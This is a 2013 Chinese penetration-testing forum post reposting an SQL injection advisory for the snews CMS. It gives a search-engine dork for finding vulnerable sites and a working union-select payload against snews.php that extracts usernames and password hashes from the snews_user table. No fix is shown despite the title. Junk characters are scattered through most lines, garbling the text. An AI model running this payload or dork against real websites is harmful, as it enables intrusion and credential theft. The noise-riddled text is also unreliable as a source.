找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 CMS snews SQL注射及修复
返回列表 发新帖
查看: 2665|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability8 h9 `5 @  e3 g2 q! J# o. S
作者: By onestree9 A/ R& |1 p$ m& {+ d5 c
下载地址 : http://snewscms.com/
* j1 g  y. Q) P测试平台 : ubuntu 12.10 / win 7
: z2 @9 d" a# S4 d2 Q& E/ @* X  H关键词: inurl:"tanyakan pada rumput yang bergoyang"
) Z& T$ g/ i6 b( W
; b# H0 e3 [' w7 M " B  H" `/ }8 Z/ o6 W2 e
*************************************************************
( t! _4 x- [# s% o! [7 m
, F: B. i4 j: u0 }) ?SQL poc:8 x+ R. h. _% r! K  t- r. {, {) _* }
+ J( ~1 q6 P6 ]8 O! M8 A+ \. y8 ~. i4 D$ ~
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]+ F' |" X; h  {

9 s, ?& x* ^  o3 @6 ~) D4 n示例. p4 _) G0 L7 F8 S: T9 F" y4 I

% Q; e* B& F7 I& t4 J+ X, q  ]1 Fhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
: K* w4 S& c# f+ r' L4 m9 V' Y* p 8 M* \2 c! U/ Y6 x( _
2 b2 b2 |- W, f5 Y, `% p4 |
致谢:
! T  J+ `$ a6 {, f: R6 ` " g% n: n: o! N! ~+ n! b
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell/ ~" t( n( q& `$ ~2 a7 R, D
     
# ~! B! \- v3 ^: ~          indonesiancoder - moeslimh4x0r - go-coder
) Y7 H* ]; Y% @* q* a+ R 8 i, u$ j2 u  F
spesial my hunny :*
* P) S% q: I9 m& s% s( ~, X8 O
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表